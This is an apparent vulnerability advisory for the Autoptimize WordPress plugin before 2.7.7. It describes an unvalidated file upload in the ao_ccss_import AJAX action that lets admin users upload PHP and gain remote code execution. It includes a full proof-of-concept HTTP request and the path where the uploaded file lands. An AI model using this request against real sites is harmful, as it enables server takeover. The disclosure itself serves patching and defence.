The ao_ccss_import AJAX call does not ensure that the file provided is a legitimate Zip file, allowing high privilege users to upload arbitrary files, such as PHP, leading to RCE.
https://drive.google.com/file/d/1siZsDiJsYRCw58Ksram5zBJOVbs-Hio1/view?usp=sharing POST /wp-admin/admin-ajax.php HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://example.com/wp-admin/options-general.php?page=ao_critcss X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------161325441624547204062709166080 Content-Length: 504 Connection: close Cookie: [Admin Cookies] -----------------------------161325441624547204062709166080 Content-Disposition: form-data; name=“file”; filename=“rce.php” Content-Type: application/zip -----------------------------161325441624547204062709166080 Content-Disposition: form-data; name=“action” ao_ccss_import -----------------------------161325441624547204062709166080 Content-Disposition: form-data; name=“ao_ccss_import_nonce” 6df2d6b321 -----------------------------161325441624547204062709166080-- Even if the request generates an error 500 (for example when PHP ZipArchive is not installed), file will be at /wp-content/uploads/ao_ccss/rce.php
CPE | Name | Operator | Version |
---|---|---|---|
autoptimize | lt | 2.7.7 |